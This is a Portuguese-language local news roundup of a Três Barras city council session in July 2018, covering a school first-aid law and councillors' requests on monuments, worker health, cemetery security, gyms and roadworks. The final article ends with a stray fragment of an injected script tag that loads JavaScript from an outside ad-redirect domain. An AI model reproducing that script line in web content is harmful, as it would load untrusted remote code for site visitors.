InícioDestaqueResumão da Câmara Sessão 11/07/2018

Resumão da Câmara Sessão 11/07/2018

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

Vereadores aprovam lei sobre capacitação em primeiros socorros em escolas

De autoria da vereadora Dani Krailing (MDB), texto prevê que a regulamentação acontecerá pelo executivo.

Os vereadores de Três Barras aprovaram o projeto de lei 8/L/2018, que dispõe sobre a obrigatoriedade de estabelecimentos públicos e privados, voltados ao ensino ou recreação infantil e fundamental, a capacitarem seu corpo docente e funcional em noções básicas de primeiros socorros. O objetivo da ação é dar celeridade a atendimentos de emergência, nos momentos que antecedem a chegada de socorro. A proposta é de autoria da vereadora Dani Krailing (MDB).

Na defesa do projeto, Krailing argumentou ser “importante que as professoras ou os funcionários possam estar capacitados para situações de emergência”, ressaltando ainda que saber o que fazer nestes casos pode ser decisivo para salvar um aluno. “Nossa intenção é a de prevenção”, destacou. Na sessão, realizada na quarta-feira, 11, ainda agradeceu o apoio que os bombeiros ofertaram para capacitar os profissionais da educação, bem como o apoio da equipe de saúde do município.

Pelo texto, fica instituída a obrigatoriedade de estabelecimentos públicos e privados voltados ao ensino ou recreação infantil e fundamental a capacitarem seu corpo docente e funcional em noções básicas de primeiros socorros, com periodicidade anual.

A lei prevê que os funcionários deverão possuir curso de formação teórico-prático em primeiros socorros, que incluirá, dentre outros tópicos, treinamento para desobstrução de vias aéreas, ressuscitação cardiopulmonar e identificação de situações de emergência. E que tais cursos, devem ser ministrados por entidades municipais ou estaduais, especializados em prática de auxílio imediato e emergencial à população, tais como Corpo de Bombeiros, Serviço de Atendimento Móvel de Urgência.

Além disso, o texto ainda proíbe a saída de grupos de alunos das escolas para prática de atividades externas, tais como excursão, passeios e outros, sem o acompanhamento de professores habilitados em primeiros socorros.

A lei agora segue para sanção ou veto do executivo, que também deverá regulamentá-la por decreto, no prazo de 120 (cento e vinte) dias, contados da sua publicação.

 

Vereadora pede manutenção na locomotiva decorativa da Estação Municipal

Carla Shimoguiri também pediu que sejam feitas melhorias no portal do São Cristóvão

A vereadora Carla Shimoguiri (PTB), solicitou através de indicação na sessão da última quarta-feira, 11, que o executivo proceda com uma manutenção na Locomotiva que fica localizada ao lado da Estação Ferroviária que abriga o Museu do Contestado. O objetivo é melhorar o aspecto visual do monumento, bem como proceder com a colocação de informações a respeito de sua história.

Segundo Carla, atualmente o monumento está mal conservado e não vem cumprindo o papel de ser um monumento histórico do município: “As pessoas vem ali, gostam de tirar fotos, então é importante estar bem conservada”, argumentou. Ela também ressaltou a importância de se colocar uma placa no local, “contendo a história para que as pessoas aprendam e entendam porque ela está ali”.

A vereadora também pediu que o executivo faça a manutenção no portal municipal, no distrito de São Cristóvão, próximo a ponte que liga o município ao vizinho Canoinhas. Segundo Carla, o local precisa de iluminação: “várias mulheres, trabalhadoras, passam ali a noite e na escuridão podem sofrer algo, quanto mais luz melhor”, afirmou.

Atenta a conservação do espaço público, ainda defendeu que a manutenção nos espaços sejam rotineiras para manter um aspecto organizado e bonito, finalizou.

 

 

Siomara quer criação de programa de saúde para atender funcionalismo

Vereadora apresentou indicação para que executivo estude a medida

A vereadora Siomara Muhlmann Correa (PP), pediu para que o executivo estude uma medida de desenvolver um programa de saúde do trabalhador para o funcionalismo municipal. Segundo ela, o horário de expediente é um dos problemas para que estes profissionais possam acessar o sistema de saúde. A pauta foi apresentada na sessão da última quarta-feira, 11.

O texto pede para que o executivo pondere sobre a saúde do trabalhador para dar mais amparo aos servidores municipais.

A vereadora ainda sugeriu que sejam realizados convênios com o SESC/LER; SEST/SENAT; e Clínicas de Saúde, possibilitando um horário diferenciado de atendimento, tanto no que se refere a cursos, como no que se refere a atendimentos médicos especializados.

Ao defender a indicação na tribuna, Siomara destacou que “há necessidade de fazer um horário especial fora do expediente do funcionalismo”, afirmando que isso poderia reduzir o número de pessoas que faltam ao trabalho por consultas médicas: “hoje são muitos atestados”, afirmou.

Sobre a importância do desenvolvimento do programa, enalteceu que essa é uma das maneiras de valorizar o funcionalismo: “a gente também tem que cuidar de quem cuida”, ao defender o trabalho dos funcionários públicos do município.

Siomara também pediu a colaboração dos colegas na divulgação do projeto SESC Mulher, momento em que pediu para que as mulheres procurem os postos de saúde do município.

 

 

Vereador critica vandalismo no Cemitério Municipal

Ernani Jr pediu para que o município melhore a iluminação e coloque câmeras de segurança no local.

O vereador Ernani Wogeinaki Jr (PSB), apresentou duas indicações na sessão da última quarta-feira, 11. Uma delas trata de melhorias na iluminação do cemitério municipal, na sede do município. O vereador criticou atos de vandalismo que ocorreram no local e pediu medidas emergenciais. Também sugeriu a instalação de câmeras de segurança.

“Esse é um pedido da comunidade”, defendeu ao utilizar a tribuna. Alertando que “na semana passada houve vandalismo no cemitério, onde roubaram peças de bronze”, criticou. Ao desenvolver o tema, disse que é emergencial que “se melhore a iluminação e também se coloquem câmeras de seguranças para coibir esse tipo de prática”, salientou.

Júnior também sugeriu que o município estude a terceirização da administração do local, para que haja um responsável que fique mais atento a estas questões.

Em outro tema tratou da manutenção dos ginásios de esportes, solicitando melhorias nas estruturas.

 

 

Vereador pede construção de banheiros e vestiários em Ginásio da Campininha

Gorguinho afirmou que a estrutura é utilizada por crianças no período diurno

O vereador Marco Antônio de Souza, Gorguinho (MDB), solicitou que o executivo promova melhorias no Ginásio Alceu Adilson Rank, localizado na Campininha, interior do município. Ele afirmou que a estrutura precisa dessa obra para melhorar as condições de higiene do local. A indicação foi apresentada na quarta-feira, 11.

Gorguinho disse que a indicação resultou “do pedido dos amigos da Campininha”, ao contar que a atual estrutura não conta com Vestiários nem Banheiros e que isso comprometeria as condições sanitárias do local: “é preocupante, porque tem crianças que usam o ginásio durante o dia”, alertou.

O Ginásio fica localizado na Escola João Pedro de Oliveira, e pela indicação, sugere-se que o município proceda com a instalação de vestiários ou banheiros, femininos e masculinos.

Sobre outros temas, Gorguinho se posicionou, mais uma vez, contra a aprovação de cargos no município, posição que foi seguida por Dani Krailing, correligionária. O texto teve nova apreciação de parecer na última quarta-feira e foi aprovada por 6 votos a 2, seguindo agora para comissão de finanças. A votação definitiva, ainda não ocorreu.

 

Bano destaca trabalhos na rua 10 de julho no São Cristóvão

“Já que eles estão por ali – equipe de obras – poderiam aproveitar para fazer a tubulação” disparou.

O vereador Fabiano José Mendes, Bano (PSD), destacou o trabalho que a secretaria de obras está realizando na Rua 10 de Julho, localizada no distrito de São Cristóvão. Para ele, a demanda é antiga, uma vez que afirmou realizar indicações para esta melhoria desde o ano de 2014. Apesar de parabenizar a ação, pediu para que o trabalho seja completo e não, apenas, paliativo.

O vereador utilizou a palavra livre da sessão da última quarta-feira, 11, onde afirmou: “já que eles estão por ali – equipe de obras – poderiam aproveitar para fazer a tubulação para o esgoto, para que esse trabalho não seja provisório”, logo após parabenizar o prefeito Luiz Shimoguiri (PSD) pelas melhorias.

Bano também destacou que os carros do município têm de estar identificados com o brasão, a fim de evitar que a comunidade confunda veículos particulares com os da prefeitura: “outro dia, alguém me questionou se o meu carro, que é branco, era realmente meu ou do município”, ao pedir atenção do prefeito nesta questão.

Segundo o vereador, há dois carros públicos que ainda não foram plotados com o brasão: “espero que cumpra-se a lei que essa casa aprovou, e que obriga a município a padronizar todos os automóveis da prefeitura”, finalizou…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.